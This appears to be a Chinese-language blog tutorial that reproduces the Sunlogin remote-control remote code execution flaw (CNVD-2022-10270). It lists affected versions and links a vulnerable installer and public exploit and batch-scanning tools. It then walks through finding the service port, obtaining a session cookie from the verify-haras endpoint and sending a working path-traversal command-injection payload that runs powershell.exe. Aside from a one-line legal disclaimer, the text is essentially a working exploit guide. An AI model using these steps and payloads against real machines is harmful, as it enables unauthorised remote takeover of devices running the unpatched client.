向日葵远程代码执行漏洞(RCE)复现
0x00-引言
本文内容及使用工具仅限学习交流,使用者请务必遵守当地法律法规。
0x01-漏洞描述
向日葵远程控制是一款提供远程控制服务的软件。其支持主流操作系统Windows、Linux、Mac、Android、iOS跨平台协同操作,在任何可连入互联网的地点,都可以轻松访问和控制安装了向日葵远程控制客户端的设备。整个远控过程,可通过浏览器直接进行,无需再安装软件。最近向日葵爆出了存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。
影响版本:
向日葵个人版 Windows <= 11.0.0.33
向日葵简约版 <= V1.0.1.43315(2021.12)
0x02-漏洞复现
-
向日葵客户端(含漏洞):10.3.0.27372
https://msoft.win10com.com/202005/SunloginClient_10.3.0.27372.zip
-
工具下载(含有漏洞版本的向日葵):
https://github.com/Mr-xn/sunlogin_rce/releases/tag/new
- 工具命令:
-h 指定目标
-t 选择扫描或者命令执行 默认scan
-p 设置扫描端口范围 默认4w到65535
-c 需要执行的命令
01-工具复现
- 安装向日葵客户端:(记得装再虚拟机里面)
- 使用工具检测
- 命令执行
02-手动复现
- nmap探测端口
- 对于探测到的端口无法准确判断,可以使用
tasklist命令得到进程号:
- 使用命令
netstat -ano | findstr PID,对进程号逐一查看:
这里跟大家分享一点经验,经过多次测试,端口开放在0.0.0.0上的,基本就是它了。
- 浏览器访问
ip+端口号+cgi-bin/rpc?action=verify-haras,获取cookie值:
-
拿到cookie后,添加payload发送:
payload奉上,有ping和nslookup两种拼接:
http://192.168.131.140:58403/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami
http://192.168.131.140:58403/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami
03-批量检测
工具下载:
https://github.com/mrknow001/Sunlogin-rce
